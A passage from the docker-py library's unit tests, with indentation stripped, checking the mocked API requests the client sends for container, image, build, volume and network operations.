lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_lxc_conf_compat(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_ro(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {
"bind": '/mnt',
"ro": True
}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_rw(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {"bind": '/mnt', "ro": False}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_port_binds(self):
self.maxDiff = None
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
pytest.deprecated_call(call_start)
def test_start_container_with_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, links={'path': 'alias'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_multiple_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
'path1': 'alias1',
'path2': 'alias2'
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_links_as_list_of_tuples(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[('path', 'alias')])
pytest.deprecated_call(call_start)
def test_start_container_privileged(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
pytest.deprecated_call(call_start)
def test_start_container_with_dict_instead_of_id(self):
self.client.start({'Id': fake_api.FAKE_CONTAINER_ID})
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_restart_policy(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
restart_policy={
"Name": "always",
"MaximumRetryCount": 0
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['RestartPolicy'] = {
"MaximumRetryCount": 0, "Name": "always"
}
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_added_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_add=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapAdd'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_dropped_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_drop=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapDrop'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_devices(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
devices=['/dev/sda:/dev/xvda:rwm',
'/dev/sdb:/dev/xvdb',
'/dev/sdc']
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Devices'] = [
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvda',
'PathOnHost': '/dev/sda'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvdb',
'PathOnHost': '/dev/sdb'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/sdc',
'PathOnHost': '/dev/sdc'}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_dict(self):
labels_dict = {
six.text_type('foo'): six.text_type('1'),
six.text_type('bar'): six.text_type('2'),
}
self.client.create_container(
'busybox', 'true',
labels=labels_dict,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_list(self):
labels_list = [
six.text_type('foo'),
six.text_type('bar'),
]
labels_dict = {
six.text_type('foo'): six.text_type(),
six.text_type('bar'): six.text_type(),
}
self.client.create_container(
'busybox', 'true',
labels=labels_list,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_named_volume(self):
mount_dest = '/mnt'
volume_name = 'name'
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(
binds={volume_name: {
"bind": mount_dest,
"ro": False
}}),
volume_driver='foodriver',
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['VolumeDriver'] = 'foodriver'
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["name:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_resize_container(self):
self.client.resize(
{'Id': fake_api.FAKE_CONTAINER_ID},
height=15,
width=120
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/resize',
params={'h': 15, 'w': 120},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_rename_container(self):
self.client.rename(
{'Id': fake_api.FAKE_CONTAINER_ID},
name='foobar'
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/rename',
params={'name': 'foobar'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_wait(self):
self.client.wait(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def test_wait_with_dict_instead_of_id(self):
self.client.wait({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_logs(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_logs_with_dict_instead_of_id(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_log_streaming(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_log_tail(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=False,
tail=10)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 10},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
def test_log_tty(self):
m = mock.Mock()
with mock.patch('docker.Client.inspect_container',
fake_inspect_container_tty):
with mock.patch('docker.Client._stream_raw_result',
m):
self.client.logs(fake_api.FAKE_CONTAINER_ID,
stream=True)
self.assertTrue(m.called)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_diff(self):
self.client.diff(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_diff_with_dict_instead_of_id(self):
self.client.diff({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_port(self):
self.client.port({'Id': fake_api.FAKE_CONTAINER_ID}, 1111)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_stop_container(self):
timeout = 2
self.client.stop(fake_api.FAKE_CONTAINER_ID, timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_stop_container_with_dict_instead_of_id(self):
timeout = 2
self.client.stop({'Id': fake_api.FAKE_CONTAINER_ID},
timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_exec_create(self):
self.client.exec_create(fake_api.FAKE_CONTAINER_ID, ['ls', '-1'])
args = fake_request.call_args
self.assertEqual(
'POST',
args[0][0], url_prefix + 'containers/{0}/exec'.format(
fake_api.FAKE_CONTAINER_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'AttachStdout': True,
'Container': fake_api.FAKE_CONTAINER_ID,
'Cmd': ['ls', '-1'],
'Privileged': False,
'AttachStdin': False,
'AttachStderr': True,
'User': ''
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_start(self):
self.client.exec_start(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/start'.format(
fake_api.FAKE_EXEC_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'Detach': False,
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_inspect(self):
self.client.exec_inspect(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/json'.format(
fake_api.FAKE_EXEC_ID
)
)
def test_exec_resize(self):
self.client.exec_resize(fake_api.FAKE_EXEC_ID, height=20, width=60)
fake_request.assert_called_with(
'POST',
url_prefix + 'exec/{0}/resize'.format(fake_api.FAKE_EXEC_ID),
params={'h': 20, 'w': 60},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_pause_container(self):
self.client.pause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/pause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_unpause_container(self):
self.client.unpause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/unpause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_kill_container(self):
self.client.kill(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_dict_instead_of_id(self):
self.client.kill({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_signal(self):
self.client.kill(fake_api.FAKE_CONTAINER_ID, signal=signal.SIGTERM)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={'signal': signal.SIGTERM},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container(self):
self.client.restart(fake_api.FAKE_CONTAINER_ID, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container_with_dict_instead_of_id(self):
self.client.restart({'Id': fake_api.FAKE_CONTAINER_ID}, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container_with_dict_instead_of_id(self):
self.client.remove_container({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export(self):
self.client.export(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export_with_dict_instead_of_id(self):
self.client.export({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container(self):
self.client.inspect_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_container(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_container_stats(self):
self.client.stats(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/stats',
timeout=60,
stream=True
)
def test_container_top(self):
self.client.top(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_container_top_with_psargs(self):
self.client.top(fake_api.FAKE_CONTAINER_ID, 'waux')
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={'ps_args': 'waux'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
##################
# IMAGES TESTS #
##################
def test_pull(self):
self.client.pull('joffrey/test001')
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertFalse(args[1]['stream'])
def test_pull_stream(self):
self.client.pull('joffrey/test001', stream=True)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertTrue(args[1]['stream'])
def test_commit(self):
self.client.commit(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'commit',
data='{}',
headers={'Content-Type': 'application/json'},
params={
'repo': None,
'comment': None,
'tag': None,
'container': '3cc2351ab11b',
'author': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_image(self):
self.client.remove_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'images/e9aa60c60128',
params={'force': False, 'noprune': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_history(self):
self.client.history(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/history',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image(self):
self.client.import_image(
fake_api.FAKE_TARBALL_PATH,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': fake_api.FAKE_TARBALL_PATH
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_bytes(self):
stream = (i for i in range(0, 100))
self.client.import_image(
stream,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': '-',
},
headers={
'Content-Type': 'application/tar',
},
data=stream,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_image(self):
self.client.import_image(
image=fake_api.FAKE_IMAGE_NAME,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromImage': fake_api.FAKE_IMAGE_NAME
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image(self):
self.client.inspect_image(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_image(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_insert_image(self):
try:
self.client.insert(fake_api.FAKE_IMAGE_NAME,
fake_api.FAKE_URL, fake_api.FAKE_PATH)
except docker.errors.DeprecatedMethod:
self.assertTrue(
docker.utils.compare_version('1.12', self.client._version) >= 0
)
return
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/insert',
params={
'url': fake_api.FAKE_URL,
'path': fake_api.FAKE_PATH
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_with_tag(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(
fake_api.FAKE_IMAGE_NAME, tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': fake_api.FAKE_TAG_NAME,
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_stream(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME, stream=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image(self):
self.client.tag(fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_tag(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID,
fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': 'tag',
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_force(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME, force=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 1
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_get_image(self):
self.client.get_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/e9aa60c60128/get',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_load_image(self):
self.client.load_image('Byte Stream....')
fake_request.assert_called_with(
'POST',
url_prefix + 'images/load',
data='Byte Stream....',
timeout=DEFAULT_TIMEOUT_SECONDS
)
#################
# BUILDER TESTS #
#################
def test_build_container(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script)
def test_build_container_pull(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, pull=True)
def test_build_container_stream(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, stream=True)
def test_build_container_custom_context(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
self.client.build(fileobj=context, custom_context=True)
def test_build_container_custom_context_gzip(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
gz_context = gzip.GzipFile(fileobj=context)
self.client.build(
fileobj=gz_context,
custom_context=True,
encoding="gzip"
)
def test_build_remote_with_registry_auth(self):
self.client._auth_configs = {
'https://example.com': {
'user': 'example',
'password': 'example',
'email': 'example@example.com'
}
}
self.client.build(path='https://github.com/docker-library/mongo')
def test_build_container_with_named_dockerfile(self):
self.client.build('.', dockerfile='nameddockerfile')
def test_build_container_with_container_limits(self):
self.client.build('.', container_limits={
'memory': 1024 * 1024,
'cpusetcpus': 1,
'cpushares': 1000,
'memswap': 1024 * 1024 * 8
})
def test_build_container_invalid_container_limits(self):
self.assertRaises(
docker.errors.DockerException,
lambda: self.client.build('.', container_limits={
'foo': 'bar'
})
)
###################
# VOLUMES TESTS #
###################
@base.requires_api_version('1.21')
def test_list_volumes(self):
volumes = self.client.volumes()
self.assertIn('Volumes', volumes)
self.assertEqual(len(volumes['Volumes']), 2)
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], url_prefix + 'volumes')
@base.requires_api_version('1.21')
def test_create_volume(self):
name = 'perfectcherryblossom'
result = self.client.create_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
self.assertEqual(args[1]['data'], {
'Name': name, 'Driver': None, 'DriverOpts': None
})
@base.requires_api_version('1.21')
def test_create_volume_with_driver(self):
name = 'perfectcherryblossom'
driver_name = 'sshfs'
self.client.create_volume(name, driver=driver_name)
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
self.assertIn('Driver', args[1]['data'])
self.assertEqual(args[1]['data']['Driver'], driver_name)
@base.requires_api_version('1.21')
def test_create_volume_invalid_opts_type(self):
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts='hello=world'
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=['hello=world']
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=''
)
@base.requires_api_version('1.21')
def test_inspect_volume(self):
name = 'perfectcherryblossom'
result = self.client.inspect_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
@base.requires_api_version('1.21')
def test_remove_volume(self):
name = 'perfectcherryblossom'
result = self.client.remove_volume(name)
self.assertIsNone(result)
args = fake_request.call_args
self.assertEqual(args[0][0], 'DELETE')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
#####################
# NETWORK TESTS #
#####################
def test_create_network(self):
network_data = {
"id": 'abc12345',
"warning": "",
}
network_response = response(status_code=200, content=network_data)
post = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.post', post):
result = self.client.create_network('foo')
self.assertEqual(result, network_data)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/create')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo"})
self.client.create_network('foo', 'bridge')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo", "driver": "bridge"})
def test_remove_network(self):
network_id = 'abc12345'
delete = mock.Mock(return_value=response(status_code=200))
with mock.patch('docker.Client.delete', delete):
self.client.remove_network(network_id)
args = delete.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
def test_inspect_network(self):
network_id = 'abc12345'
network_name = 'foo'
network_data = {
six.u('name'): network_name,
six.u('id'): network_id,
six.u('driver'): 'bridge',
six.u('containers'): {},
}
network_response = response(status_code=200, content=network_data)
get = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.get', get):
result = self.client.inspect_network(network_id)
self.assertEqual(result, network_data)
args = get.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
def test_connect_container_to_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.connect_container_to_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/connect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
